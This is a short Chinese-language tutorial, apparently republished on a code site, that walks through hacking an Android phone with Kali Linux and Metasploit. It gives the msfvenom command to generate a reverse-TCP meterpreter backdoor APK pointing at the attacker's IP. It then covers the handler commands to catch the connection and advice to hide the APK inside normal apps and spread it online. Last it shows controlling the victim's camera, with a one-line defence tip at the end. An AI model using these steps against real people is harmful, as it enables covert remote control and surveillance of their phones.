演示使用Metasploit入侵Android


文本演示怎么使用Kali Linux入侵Android手機。

Kali Linux IP地址:192.168.0.112;接收連接的端口:443。

同一局域網內android手機一部(android 5.1)

創建一個后門程序

在終端中執行:

# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=443 > my_backdoor.apk

這個后門程序(APK)是發送給受害者的;要把上面命令的IP地址替換為攻擊者IP,當后門程序運行時,它會試圖連接這個IP。

啟動Metasploit-等待受害者啟動后門程序

msfconsole

依次執行:

msf > use exploit/multi/handler
    > set payload android/meterpreter/reverse_tcp
    > set lhost 192.168.0.112
    > set lport 443
    > exploit

分發后門程序

一般后門程序都打包到正常app中,反正就是各種藏;

借助internet分發后門程序。

閑話不多書,這里我在自己的android手機上安裝運行帶后門的apk。

病毒!!!

控制受害者手機

受害者運行后門程序之后,就可以使用Metasploit控制他了:

使用help查看可以使用的命令:

例如使用對方的攝像頭拍照:

> webcam_list
> webcam_snap

怎么防范:

  • 不要安裝不信任的apk


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM